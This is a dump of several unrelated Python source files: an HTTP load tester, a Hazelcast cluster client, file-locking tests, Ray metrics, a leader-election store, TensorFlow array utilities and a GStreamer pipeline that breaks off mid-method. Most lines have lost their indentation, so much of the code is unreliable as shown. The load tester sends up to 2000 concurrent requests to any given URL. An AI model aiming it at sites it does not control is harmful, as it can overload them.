screen.addstr(9, 40, 'Requests handled: %s ' % requests_handled)
if result_codes and test_seconds and '200 OK' in result_codes:
screen.addstr(10, 2, 'Requests per second: %.2f ' % (int(result_codes['200 OK']) / test_seconds), )
if durations:
screen.addstr(10, 40, 'Average Request: %.2f seconds ' % (reduce(lambda x, y: x + y, durations) / len(durations)))
screen.addstr(12, 2, rc)
screen.refresh()
time.sleep(0.1)
tests = [
(50, 50,),
(100, 100,),
(200, 200,),
(400, 400,),
(600, 600,),
(800, 800,),
(1000, 1000,),
(1500, 1000,),
(2000, 1000,),
(2000, 1500,),
(2000, 2000,)
]
@click.command()
@click.option('--url', prompt="URL to request")
@click.option('--timeout', default=10)
@click.option('--tolerance', default=5)
def main(url, timeout, tolerance):
global break_out, status, target_hits, timeout_count, connection_error_count, non_200_count, test_number, \
result_codes, elapsed, requests_handled, test_start, test_stop, _timeout, _tolerance, screen, hits, workers, \
_url, durations
_timeout = timeout
_tolerance = tolerance
_url = url
logging.warning('Starting up...')
# Check that the url provided is valid
try:
requests.get(url, timeout=5)
except requests.exceptions.MissingSchema:
print "Invalid URL"
sys.exit(1)
except requests.exceptions.ConnectionError:
print "Is that a valid URL? We can't connect to it."
sys.exit(1)
except Exception as e:
print "Something went wrong trying to connect... timeout?"
print e
sys.exit(1)
try:
screen = curses.initscr()
screen.border(0)
curses.start_color()
curses.init_color(0, 0, 0, 0)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(10, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(11, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.curs_set(0)
# curses.noecho()
ui = Thread(target=update_ui_worker)
ui.daemon = True
ui.start()
for test in tests:
hits = test[0]
workers = test[1]
if break_out:
break
target_hits = hits
for t in range(hits):
q.put(url)
for w in range(workers):
t = Thread(target=do_work)
t.start()
# q.join()
status = "Waiting for workers to spin down..."
            while True:
                if threading.active_count() <= 2:
                    break
                time.sleep(0.1)  # avoid a busy-wait while workers drain
if timeout_count + connection_error_count + non_200_count > tolerance:
result = 'Fail'
cp = curses.color_pair(2)|curses.A_BOLD
else:
result = 'Pass'
cp = curses.color_pair(3)|curses.A_BOLD
result_200 = result_codes.get('200 OK')
if result_200 is None:
result_200 = 0
else:
result_200 = int(result_200)
            average_request_time = 0
            if durations:
                average_request_time = reduce(lambda x, y: x + y, durations) / len(durations)
if test_seconds:
screen.addstr(13 + test_number, 2, '%s hits with %s workers: %s (%.2f RPS | %.2f ART | %d ERR) ' %
(hits, workers, result, result_200/test_seconds, average_request_time, non_200_count), cp)
if 'Fail' in result:
break_out = True
break
status = "Restarting..."
time.sleep(2)
result_codes = {}
non_200_count = 0
elapsed = []
durations = []
timeout_count = 0
connection_error_count = 0
test_number += 1
requests_handled = 0
test_start = None
test_stop = None
except KeyboardInterrupt:
with q.mutex:
q.queue.clear()
break_out = True
test_stop = time.time()
screen.addstr(16 + test_number, 2, "Test cancelled.")
logging.warning('Keyboard Exit')
finally:
curses.endwin()
logging.warning('Exit 2a')
screen.addstr(16 + test_number, 2, "Press any key to exit.")
screen.getch()
curses.endwin()
logging.warning('Exit 2')
if __name__ == "__main__":
main()
|
cluster.py
|
import logging
import random
import threading
import time
import uuid
from hazelcast.core import CLIENT_TYPE, SERIALIZATION_VERSION
from hazelcast.exception import HazelcastError, AuthenticationError, TargetDisconnectedError
from hazelcast.invocation import ListenerInvocation
from hazelcast.lifecycle import LIFECYCLE_STATE_CONNECTED, LIFECYCLE_STATE_DISCONNECTED
from hazelcast.protocol.codec import client_add_membership_listener_codec, client_authentication_codec
from hazelcast.util import get_possible_addresses
# Membership Event Types
MEMBER_ADDED = 1
MEMBER_REMOVED = 2
class ClusterService(object):
logger = logging.getLogger("ClusterService")
def __init__(self, config, client):
self._config = config
self._client = client
self.members = []
self.owner_connection_address = None
self.owner_uuid = None
self.uuid = None
self.listeners = {}
for listener in config.membership_listeners:
self.add_listener(*listener)
self._initial_list_fetched = threading.Event()
self._client.connection_manager.add_listener(on_connection_closed=self._connection_closed)
self._client.heartbeat.add_listener(on_heartbeat_stopped=self._heartbeat_stopped)
def start(self):
self._connect_to_cluster()
def shutdown(self):
pass
def size(self):
return len(self.members)
def add_listener(self, member_added=None, member_removed=None, fire_for_existing=False):
registration_id = str(uuid.uuid4())
self.listeners[registration_id] = (member_added, member_removed)
if fire_for_existing:
for member in self.members:
member_added(member)
return registration_id
def remove_listener(self, registration_id):
try:
self.listeners.pop(registration_id)
return True
except KeyError:
return False
def _reconnect(self):
try:
            self.logger.warning("Connection closed to owner node. Trying to reconnect.")
self._connect_to_cluster()
        except Exception:
            self.logger.exception("Could not reconnect to cluster. Shutting down client.")
self._client.shutdown()
def _connect_to_cluster(self): # TODO: can be made async
addresses = get_possible_addresses(self._config.network_config.addresses, self.members)
current_attempt = 1
attempt_limit = self._config.network_config.connection_attempt_limit
retry_delay = self._config.network_config.connection_attempt_period
        while current_attempt <= attempt_limit:
for address in addresses:
try:
self.logger.info("Connecting to %s", address)
self._connect_to_address(address)
return
                except Exception:
self.logger.warning("Error connecting to %s, attempt %d of %d, trying again in %d seconds",
address, current_attempt, attempt_limit, retry_delay, exc_info=True)
time.sleep(retry_delay)
current_attempt += 1
error_msg = "Could not connect to any of %s after %d tries" % (addresses, attempt_limit)
raise HazelcastError(error_msg)
def _authenticate_manager(self, connection):
request = client_authentication_codec.encode_request(
username=self._config.group_config.name, password=self._config.group_config.password,
uuid=None, owner_uuid=None, is_owner_connection=True, client_type=CLIENT_TYPE,
serialization_version=SERIALIZATION_VERSION)
def callback(f):
parameters = client_authentication_codec.decode_response(f.result())
if parameters["status"] != 0: # TODO: handle other statuses
raise AuthenticationError("Authentication failed.")
connection.endpoint = parameters["address"]
connection.is_owner = True
self.owner_uuid = parameters["owner_uuid"]
self.uuid = parameters["uuid"]
return connection
return self._client.invoker.invoke_on_connection(request, connection).continue_with(callback)
def _connect_to_address(self, address):
connection = self._client.connection_manager.get_or_connect(address, self._authenticate_manager).result()
if not connection.is_owner:
self._authenticate_manager(connection).result()
self.owner_connection_address = connection.endpoint
self._init_membership_listener(connection)
self._client.lifecycle.fire_lifecycle_event(LIFECYCLE_STATE_CONNECTED)
def _init_membership_listener(self, connection):
request = client_add_membership_listener_codec.encode_request(False)
def handler(m):
client_add_membership_listener_codec.handle(m, self._handle_member, self._handle_member_list)
response = self._client.invoker.invoke(
ListenerInvocation(request, handler, connection=connection)).result()
registration_id = client_add_membership_listener_codec.decode_response(response)["response"]
self.logger.debug("Registered membership listener with ID " + registration_id)
self._initial_list_fetched.wait()
def _handle_member(self, member, event_type):
self.logger.debug("Got member event: %s, %s", member, event_type)
if event_type == MEMBER_ADDED:
self._member_added(member)
elif event_type == MEMBER_REMOVED:
self._member_removed(member)
self._log_member_list()
self._client.partition_service.refresh()
def _handle_member_list(self, members):
self.logger.debug("Got initial member list: %s", members)
for m in list(self.members):
try:
members.remove(m)
except ValueError:
self._member_removed(m)
for m in members:
self._member_added(m)
self._log_member_list()
self._client.partition_service.refresh()
self._initial_list_fetched.set()
def _member_added(self, member):
self.members.append(member)
for added, _ in self.listeners.values():
if added:
try:
added(member)
                except Exception:
                    self.logger.exception("Exception in membership listener")
def _member_removed(self, member):
self.members.remove(member)
self._client.connection_manager.close_connection(member.address, TargetDisconnectedError(
"%s is no longer a member of the cluster" % member))
for _, removed in self.listeners.values():
if removed:
try:
removed(member)
                except Exception:
                    self.logger.exception("Exception in membership listener")
def _log_member_list(self):
self.logger.info("New member list:\n\nMembers [%d] {\n%s\n}\n", len(self.members),
"\n".join(["\t" + str(x) for x in self.members]))
def _connection_closed(self, connection, _):
if connection.endpoint and connection.endpoint == self.owner_connection_address \
and self._client.lifecycle.is_live:
self._client.lifecycle.fire_lifecycle_event(LIFECYCLE_STATE_DISCONNECTED)
self.owner_connection_address = None
# try to reconnect, on new thread
# TODO: can we avoid having a thread here?
reconnect_thread = threading.Thread(target=self._reconnect, name="hazelcast-cluster-reconnect")
reconnect_thread.daemon = True
reconnect_thread.start()
def _heartbeat_stopped(self, connection):
if connection.endpoint == self.owner_connection_address:
self._client.connection_manager.close_connection(connection.endpoint, TargetDisconnectedError(
"%s stopped heart beating." % connection))
def get_member_by_uuid(self, member_uuid):
for member in self.members:
if member.uuid == member_uuid:
return member
class RandomLoadBalancer(object):
def __init__(self, cluster):
self._cluster = cluster
def next_address(self):
return random.choice(self._cluster.members).address
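# Minimal sketch of wiring membership callbacks onto a running ClusterService.
# `cluster_service` is assumed to come from an already connected client; the
# callbacks below only log.
def _example_membership_listener(cluster_service):
    def on_member_added(member):
        ClusterService.logger.info("member added: %s", member)

    def on_member_removed(member):
        ClusterService.logger.info("member removed: %s", member)

    # fire_for_existing=True replays the current member list into member_added.
    return cluster_service.add_listener(member_added=on_member_added,
                                        member_removed=on_member_removed,
                                        fire_for_existing=True)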
|
contribs.py
|
import os
import threading
import time
from ._compat import unittest
from ._adapt import IS_GAE
from pydal._compat import to_bytes
from pydal.contrib.portalocker import lock, unlock, read_locked, write_locked
from pydal.contrib.portalocker import LockedFile, LOCK_EX
def tearDownModule():
if os.path.isfile('test.txt'):
os.unlink('test.txt')
class testPortalocker(unittest.TestCase):
def test_LockedFile(self):
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
f.close()
f = LockedFile('test.txt', mode='rb')
self.assertEqual(f.read(), to_bytes('test ok'))
f.close()
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_openmultiple(self):
t0 = time.time()
def worker1():
start = time.time()
f1 = LockedFile('test.txt', mode='ab')
time.sleep(2)
f1.write(to_bytes("%s\t%s\n" % (start, time.time())))
f1.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes(''))
f.close()
th = []
for x in range(10):
t1 = threading.Thread(target=worker1)
th.append(t1)
t1.start()
for t in th:
t.join()
with open('test.txt') as g:
content = g.read()
results = [line.strip().split('\t') for line in content.split('\n') if line]
# all started at more or less the same time
starts = [1 for line in results if float(line[0])-t0<1]
ends = [line[1] for line in results]
self.assertEqual(sum(starts), len(starts))
# end - start is at least 2
for line in results:
self.assertTrue(float(line[1]) - float(line[0]) >= 2)
# ends are not the same
        self.assertEqual(len(set(ends)), len(ends))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_lock_unlock(self):
def worker1(fh):
time.sleep(2)
unlock(fh)
def worker2(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker1, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
f.close()
# it took at least 2 seconds to read
# although nothing is there until .close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes(''))
content = read_locked('test.txt')
self.assertEqual(content, to_bytes('test ok'))
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker2, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
# content is there because we called close()
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_read_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = LockedFile('test.txt', mode='wb')
f.write(to_bytes('test ok'))
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
content = read_locked('test.txt')
end = int(time.time())
t1.join()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, to_bytes('test ok'))
@unittest.skipIf(IS_GAE, "GAE has no locks")
def test_write_locked(self):
def worker(fh):
time.sleep(2)
fh.close()
f = open('test.txt', mode='wb')
lock(f, LOCK_EX)
t1 = threading.Thread(target=worker, args=(f, ))
t1.start()
start = int(time.time())
write_locked('test.txt', to_bytes('test ok'))
end = int(time.time())
t1.join()
with open('test.txt') as g:
content = g.read()
# it took at least 2 seconds to read
self.assertTrue(end - start >= 2)
self.assertEqual(content, 'test ok')
def test_exception(self):
self.assertRaises(RuntimeError, LockedFile, *['test.txt', 'x'])
def test_readline(self):
f = LockedFile('test.txt', 'wb')
f.write(to_bytes('abc\n'))
f.write(to_bytes('123\n'))
f.close()
f = LockedFile('test.txt', 'rb')
rl = f.readline()
self.assertTrue(to_bytes('abc') in rl)
rl = f.readline()
self.assertTrue(to_bytes('123') in rl)
f.close()
f = LockedFile('test.txt', 'rb')
rls = f.readlines()
f.close()
self.assertEqual(len(rls), 2)
|
autoscaling_metrics.py
|
import threading
import bisect
from collections import defaultdict
import time
from typing import Callable, DefaultDict, Dict, List, Optional
from dataclasses import dataclass, field
import ray
def start_metrics_pusher(
interval_s: float,
collection_callback: Callable[[], Dict[str, float]],
controller_handle,
):
"""Start a background thread to push metrics to controller.
    We use a background thread so the push is not blocked by the user's code
    and metrics are delivered consistently. The Python GIL ensures this thread
    gets a fair share of time to run.
Args:
interval_s(float): the push interval.
collection_callback: a callable that returns the metric data points to
            be sent to the controller. The collection callback should take
            no arguments and return a dictionary of str_key -> float_value.
controller_handle: actor handle to Serve controller.
"""
def send_once():
data = collection_callback()
# TODO(simon): maybe wait for ack or handle controller failure?
return controller_handle.record_autoscaling_metrics.remote(
data=data, send_timestamp=time.time()
)
def send_forever():
last_ref: Optional[ray.ObjectRef] = None
last_send_succeeded: bool = True
while True:
start = time.time()
if last_ref:
ready_refs, _ = ray.wait([last_ref], timeout=0)
last_send_succeeded = len(ready_refs) == 1
if last_send_succeeded:
last_ref = send_once()
duration_s = time.time() - start
remaining_time = interval_s - duration_s
if remaining_time > 0:
time.sleep(remaining_time)
timer = threading.Thread(target=send_forever)
# Making this a daemon thread so it doesn't leak upon shutdown, and it
# doesn't need to block the replica's shutdown.
    timer.daemon = True
timer.start()
@dataclass(order=True)
class TimeStampedValue:
timestamp: float
value: float = field(compare=False)
class InMemoryMetricsStore:
"""A very simple, in memory time series database"""
def __init__(self):
self.data: DefaultDict[str, List[TimeStampedValue]] = defaultdict(list)
def add_metrics_point(self, data_points: Dict[str, float], timestamp: float):
"""Push new data points to the store.
Args:
data_points(dict): dictionary containing the metrics values. The
key should be a string that uniquely identifies this time series
and to be used to perform aggregation.
timestamp(float): the unix epoch timestamp the metrics are
collected at.
"""
for name, value in data_points.items():
# Using in-sort to insert while maintaining sorted ordering.
bisect.insort(a=self.data[name], x=TimeStampedValue(timestamp, value))
def window_average(
self, key: str, window_start_timestamp_s: float, do_compact: bool = True
) -> Optional[float]:
"""Perform a window average operation for metric `key`
Args:
key(str): the metric name.
window_start_timestamp_s(float): the unix epoch timestamp for the
start of the window. The computed average will use all datapoints
from this timestamp until now.
            do_compact(bool): whether to delete the datapoints that fall
                before `window_start_timestamp_s`, to save memory. Defaults
                to True.
Returns:
The average of all the datapoints for the key on and after time
window_start_timestamp_s, or None if there are no such points.
"""
datapoints = self.data[key]
idx = bisect.bisect(
a=datapoints,
x=TimeStampedValue(
timestamp=window_start_timestamp_s, value=0 # dummy value
),
)
points_after_idx = datapoints[idx:]
if do_compact:
self.data[key] = points_after_idx
if len(points_after_idx) == 0:
return
return sum(point.value for point in points_after_idx) / len(points_after_idx)
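# Minimal sketch of the InMemoryMetricsStore API above: push a few timestamped
# points and average the ones inside a window. Key names and values are made up.
def _example_window_average():
    store = InMemoryMetricsStore()
    store.add_metrics_point({"queue_size": 1.0}, timestamp=100.0)
    store.add_metrics_point({"queue_size": 3.0}, timestamp=110.0)
    store.add_metrics_point({"queue_size": 5.0}, timestamp=120.0)
    # Only the points at t=110 and t=120 fall inside the window, so this is 4.0.
    return store.window_average("queue_size", window_start_timestamp_s=105.0)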
|
leader.py
|
'''
Leader Db File
'''
from ..utils.leader_election import Leader_Election, StoppableThread
from ..utils.logger import getLogger
from threading import Lock
from time import sleep
from ..utils.network import Tcp_Message
from threading import Thread
class DbLeader(Leader_Election):
def __init__(self, ip, mask, leport, logger = getLogger(), pt=10, rt=20, ttl=4):
Leader_Election.__init__(self,ip,mask,leport, logger, pt, rt, ttl)
self.database = {}
self.freelist = []
self.deadlist = []
self.main_count = 0
self.node_count = 0
self.dblock = Lock()
self.freelock = Lock()
self.deadlock = Lock()
self.dbleaderlogger = logger
def _dbleader_start(self, time):
        Thread(target=self._check, args=(time,), daemon=True, name="Leader Checker").start()
self._start()
def _check(self, time):
        while True:
if not self.im_leader:
break
lista = self.Get_Partners()
self.lelogger.debug(f'Partners {lista}')
self._check_newones(lista)
#self.lelogger.debug(f' deadones checker initated')
self._check_deadones(lista)
sleep(time)
def _check_newones(self, lista):
for i in lista:
present = False
for key in self.database:
if present:
break
for k in range(0,2):
if i == self.database[key][k]:
#self.lelogger.debug(f'IP already in database {i}')
present = True
break
if not present:
if not i in self.freelist and i != self.ip:
self.dbleaderlogger.debug(f' IP FOUND {i}')
with self.freelock:
self.freelist.append(i)
self.node_count += 1
def _check_deadones(self, lista):
with self.dblock:
for _,val in self.database.items():
for j in range(0,2):
with self.deadlock:
if val[j] and val[j] not in lista and val[j] not in self.deadlist:
self.dbleaderlogger.debug(f'IP LOST {val[j]}')
self.deadlist.append(val[j])
#region database
def _leinsert(self, ip, id = None):
if ip != self.ip:
with self.dblock:
self.node_count += 1
if id == self.main_count:
self.database[self.main_count] = (ip,None)
self.main_count += 1
return (self.main_count -1 , 0)
elif id is None:
for i in [0,1]:
for key in self.database:
if self.database[key][i] == None:
self.database[key] = self._build_tuple(key, i, ip)
return (key, i)
self.database[self.main_count] = (ip,None)
self.main_count += 1
return (self.main_count -1 , 0)
else:
for i in range(0,2):
if self.database[id][i] == None:
self.database[id] = self._build_tuple(id, i, ip)
return (id, i)
def _ledelete(self, ip):
with self.dblock:
self.node_count -= 1
for key in self.database:
for i in range(0,2):
if self.database[key][i] == ip:
self.database[key] = self._build_tuple(key,i, None)
if self.database[key] == (None,None):
del self.database[key]
if key == self.main_count -1 :
self.main_count -= 1
return (key, i)
return None
def _leget_backup(self):
with self.dblock:
for key in self.database:
if self.database[key][1] != None:
return (key, self.database[key][1])
return None
def _build_tuple(self, key, i, val, lock = False):
if key in self.database:
other = self.database[key][(i-1)%2]
tup = (other, val) if i else (val,other)
else:
tup = (val, None)
return tup
def _exist(self, ip):
with self.dblock:
for _,tup in self.database.items():
if ip in tup:
return True
return False
#endregion
|
array_utils.py
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for manipulating, storing, and loading experiment data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import enum
import io
import threading
from absl import logging
import numpy as np
import six
from six.moves import range
import tensorflow.compat.v2 as tf
gfile = tf.io.gfile
_TFR_OPTIONS = tf.io.TFRecordOptions('GZIP')
SLICE = enum.Enum('SliceKey', ['ALL'])
def write_npz(output_dir, basename, stats_dict):
"""Write a dictionary of numpy arrays as an npz file.
Args:
output_dir: Directory for the output file.
basename: Basename for output file path.
stats_dict: Dictionary of strings to np.ndarrays.
"""
bytesio = io.BytesIO()
stats_dict = {
k: np.stack(arr) if isinstance(arr, list) else arr
for k, arr in six.iteritems(stats_dict)
}
np.savez_compressed(bytesio, **stats_dict)
path = '%s/%s' % (output_dir, basename)
logging.info('Recording stats to %s', path)
with gfile.GFile(path, 'wb') as file_handle:
file_handle.write(bytesio.getvalue())
def _dict_as_namedtuple(d):
return collections.namedtuple('tup', list(d.keys()))(**d)
def load_npz(path, as_namedtuple=False):
"""Load dictionary of arrays from an npz file.
Args:
path: File path to npz file.
as_namedtuple: If true, return the dictionary as a namedtuple.
Returns:
Dictionary (or namedtuple) of npz file contents.
"""
with gfile.GFile(path) as fl:
bytesio = io.BytesIO(fl.read())
out = dict(np.load(bytesio))
return _dict_as_namedtuple(out) if as_namedtuple else out
def stats_dict_to_tfexample(stats):
"""Converts a dictionary of numpy arrays to a tf.Example proto."""
example = tf.train.Example()
fm = example.features.feature
for key, arr in six.iteritems(stats):
arr = np.array(arr)
if key.endswith('/shape'):
raise ValueError('Invalid key: %s' % key)
if arr.dtype in (np.float32, np.float64):
fm[key].float_list.value.extend(arr.reshape([-1]))
fm[key + '/shape'].int64_list.value.extend(arr.shape)
elif arr.dtype in (np.int32, np.int64):
fm[key].int64_list.value.extend(arr.reshape([-1]))
fm[key + '/shape'].int64_list.value.extend(arr.shape)
else:
raise NotImplementedError('Unsupported array type %s for key=%s'
% (type(arr), key))
return example
def tfexample_to_stats_dict(example):
"""Converts a tf.Example proto into a dictionary of numpy arrays."""
out = {}
fm = example.features.feature
for key, value in six.iteritems(fm):
if key.endswith('/shape'):
continue
arr = (value.int64_list.value or
value.float_list.value or
value.bytes_list.value)
shape = fm[key + '/shape'].int64_list.value
out[key] = np.array(arr).reshape(shape)
return out
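# Quick round-trip sketch for the two converters above: a stats dict of float
# and int arrays survives encoding to tf.Example and back with shapes intact
# (dtypes come back as the generic float/int types). Array contents are
# illustrative.
def _example_stats_roundtrip():
  stats = {'loss': np.array([[0.5, 0.25]], dtype=np.float32),
           'step': np.array([7], dtype=np.int64)}
  example = stats_dict_to_tfexample(stats)
  restored = tfexample_to_stats_dict(example)
  # restored['loss'].shape == (1, 2), restored['step'].shape == (1,)
  return restored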
def load_stats_from_tfrecords(path, max_records=None, as_namedtuple=False,
gzip=False):
"""Loads data from a TFRecord table into a dictionary of np arrays.
Args:
path: Path to TFRecord file.
max_records: Maximum number of records to read.
as_namedtuple: If true, return the stats-dictionary as a namedtuple.
gzip: Whether to use gzip compression.
Returns:
Dictionary (or namedtuple) of numpy arrays.
"""
out = collections.defaultdict(list)
if tf.executing_eagerly():
itr = tf.data.TFRecordDataset(
path, compression_type='GZIP' if gzip else None)
parse_record = lambda x: tf.train.Example.FromString(x.numpy())
else:
tfr_options = _TFR_OPTIONS if gzip else None
itr = tf.compat.v1.python_io.tf_record_iterator(path, tfr_options)
parse_record = tf.train.Example.FromString
for i, rec in enumerate(itr):
if max_records and i >= max_records:
break
example = parse_record(rec)
stats = tfexample_to_stats_dict(example)
for key, array in six.iteritems(stats):
out[key].append(array)
out = {k: np.stack(arr) for k, arr in six.iteritems(out)}
return _dict_as_namedtuple(out) if as_namedtuple else out
class StatsWriter(object):
"""Simple wrapper class to record stats-dictionaries in TFRecord tables."""
def __init__(self, path, gzip=False):
self._writer = tf.io.TFRecordWriter(path, _TFR_OPTIONS if gzip else None)
def write(self, stats):
tfexample = stats_dict_to_tfexample(stats)
self._writer.write(tfexample.SerializeToString())
def write_batch(self, stats_batch):
batch_size, = set(len(x) for x in six.itervalues(stats_batch))
for i in range(batch_size):
stats_i = {k: v[i] for k, v in six.iteritems(stats_batch)}
tfexample = stats_dict_to_tfexample(stats_i)
self._writer.write(tfexample.SerializeToString())
def __del__(self):
self._writer.flush()
self._writer.close()
def slice_structure(struct, keys):
"""Generalized (but limited) slice function on nested structures.
This function offers limited numpy-style array slicing on nested structures
of maps, lists, tuples, and arrays. Specifically, by assuming similar
structures along each dictionary / list / tuple value, we can support
select-all and index-list slicing (e.g. x[3, :, 1] or x[3, indices, 1]).
For example,
x = {'a': [1, 2], 'b': [3, 4], 'c': [5, 6]}
slice_structure(x, [SLICE.ALL, 0])
will yield `{'a': 1, 'b': 3, 'c': 5}`
and
slice_structure(x, [['a', 'c', 'b'], 0])
yields `[1, 5, 3]`.
Args:
struct: Nested structure of dictionaries, lists, tuples, numpy arrays.
keys: List of keys to apply at each successive depth;
SLICE.ALL gathers all items.
Returns:
Nested structure with specified slices applied.
  Note: Structure elements are not necessarily copied in the process.
"""
if not keys:
return struct
if keys[0] is SLICE.ALL:
if isinstance(struct, dict):
return {k: slice_structure(v, keys[1:]) for k, v in struct.items()}
elif isinstance(struct, (list, tuple)):
return type(struct)([slice_structure(struct_i, keys[1:])
for struct_i in struct])
else:
raise NotImplementedError('Unsupported type for ALL: %s.' % type(struct))
# List-of-indices slicing.
elif isinstance(keys[0], list):
return [slice_structure(struct[k], keys[1:]) for k in keys[0]]
# Simple get-element-at-index case.
else:
return slice_structure(struct[keys[0]], keys[1:])
class _MapResult(object):
"""Simple temporary container for threaded_map_structure() results.
Note: We can't use a simple Python list (or other builtin mutable container)
for this since tf.nest.map_structure will traverse the list and operate on
its elements.
Attributes:
result: Equals None before calling the map-function;
assigned to the function output afterwards.
"""
def __init__(self):
self.result = None
def assign(self, x):
"""Assigns a value to a container attribute for later retrieval."""
self.result = x
def threaded_map_structure(fn, *args):
"""Executes tf.nest.map_structure with parallel threads for each map call.
Primarily useful for slow, non-compute functions (e.g. loading data from CNS).
See tf.nest.map_structure for details.
Args:
fn: Function to map across leaf nodes in args structure.
*args: Nested structures of arguments to map over.
Returns:
Parallel structure to the one in args with map results.
"""
fn_nooutput = lambda result, *args_: result.assign(fn(*args_))
def make_thread_fn(result, *args_):
return threading.Thread(target=fn_nooutput, args=(result,) + args_)
outputs = tf.nest.map_structure(lambda *_: _MapResult(), *args)
threads = tf.nest.map_structure(make_thread_fn, outputs, *args)
tf.nest.map_structure(lambda t: t.start(), threads)
tf.nest.map_structure(lambda t: t.join(), threads)
return tf.nest.map_structure(lambda x: x.result, outputs)
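# Usage sketch (illustrative; not from the original module): fan a slow,
# I/O-bound callable out over every leaf of a nested structure, one thread per
# leaf. len() stands in here for something like a per-file load.
def _threaded_map_example():
  paths = {'train': ['train-00000', 'train-00001'], 'eval': ['eval-00000']}
  return threaded_map_structure(len, paths)  # {'train': [11, 11], 'eval': [10]}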
|
gstreamer_pipeline.py
|
'''
* Copyright (C) 2019-2020 Intel Corporation.
*
* SPDX-License-Identifier: BSD-3-Clause
'''
import copy
import json
import os
import string
import time
from threading import Lock, Thread
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstApp', '1.0')
# pylint: disable=wrong-import-position
from gi.repository import GLib, Gst, GstApp # pylint: disable=unused-import
from gstgva.util import GVAJSONMeta
from vaserving.app_destination import AppDestination
from vaserving.app_source import AppSource
from vaserving.common.utils import logging
from vaserving.pipeline import Pipeline
# pylint: enable=wrong-import-position
logger = logging.get_logger('GSTPipeline', is_static=True)
class GStreamerPipeline(Pipeline):
Gst.init(None)
GVA_INFERENCE_ELEMENT_TYPES = ["GstGvaDetect",
"GstGvaClassify",
"GstGvaInference",
"GvaAudioDetect"]
_inference_element_cache = {}
_mainloop = None
_mainloop_thread = None
@staticmethod
def gobject_mainloop():
gi.require_version('Gst', '1.0')
from gi.repository import GLib
GStreamerPipeline._mainloop = GLib.MainLoop.new(None, False)
try:
GStreamerPipeline._mainloop.run()
except (KeyboardInterrupt, SystemExit):
pass
def __init__(self, identifier, config, model_manager, request, finished_callback):
# TODO: refactor as abstract interface
# pylint: disable=super-init-not-called
self.config = config
self.identifier = identifier
self.pipeline = None
self.template = config['template']
self.models = model_manager.models
self.model_manager = model_manager
self.request = request
self.state = Pipeline.State.QUEUED
self.frame_count = 0
self.start_time = None
self.stop_time = None
self.avg_fps = 0
self._gst_launch_string = None
self.latency_times = dict()
self.sum_pipeline_latency = 0
self.count_pipeline_latency = 0
self._real_base = None
self._stream_base = None
self._year_base = None
self._month_base = None
self._day_base = None
self._dir_name = None
self._bus_connection_id = None
self._create_delete_lock = Lock()
self._finished_callback = finished_callback
self._bus_messages = False
self.appsrc_element = None
self._app_source = None
self.appsink_element = None
self._app_destination = None
if (not GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop_thread = Thread(
target=GStreamerPipeline.gobject_mainloop)
GStreamerPipeline._mainloop_thread.daemon = True
GStreamerPipeline._mainloop_thread.start()
@staticmethod
def mainloop_quit():
if (GStreamerPipeline._mainloop):
GStreamerPipeline._mainloop.quit()
GStreamerPipeline._mainloop = None
if (GStreamerPipeline._mainloop_thread):
GStreamerPipeline._mainloop_thread = None
def _delete_pipeline(self, new_state):
self.state = new_state
self.stop_time = time.time()
logger.debug("Setting Pipeline {id}"
" State to {next_state}".format(id=self.identifier,
next_state=new_state.name))
if self.pipeline:
bus = self.pipeline.get_bus()
if self._bus_connection_id:
bus.remove_signal_watch()
bus.disconnect(self._bus_connection_id)
self._bus_connection_id = None
self.pipeline.set_state(Gst.State.NULL)
del self.pipeline
self.pipeline = None
if self._app_source:
self._app_source.finish()
if self._app_destination:
self._app_destination.finish()
self._finished_callback()
def _delete_pipeline_with_lock(self, new_state):
with(self._create_delete_lock):
self._delete_pipeline(new_state)
def stop(self):
with(self._create_delete_lock):
if not self.state.stopped():
if (self.pipeline):
structure = Gst.Structure.new_empty(self.state.name)
message = Gst.Message.new_custom(
Gst.MessageType.APPLICATION, None, structure)
self.pipeline.get_bus().post(message)
else:
self.state = Pipeline.State.ABORTED
return self.status()
def params(self):
# TODO: refactor
# pylint: disable=R0801
request = copy.deepcopy(self.request)
if "models" in request:
del request["models"]
params_obj = {
"id": self.identifier,
"request": request,
"type": self.config["type"],
"launch_command": self._gst_launch_string
}
return params_obj
def status(self):
logger.debug("Called Status")
if self.start_time is not None:
if self.stop_time is not None:
elapsed_time = max(0, self.stop_time - self.start_time)
else:
elapsed_time = max(0, time.time() - self.start_time)
else:
elapsed_time = None
status_obj = {
"id": self.identifier,
"state": self.state,
"avg_fps": self.avg_fps,
"start_time": self.start_time,
"elapsed_time": elapsed_time
}
if self.count_pipeline_latency != 0:
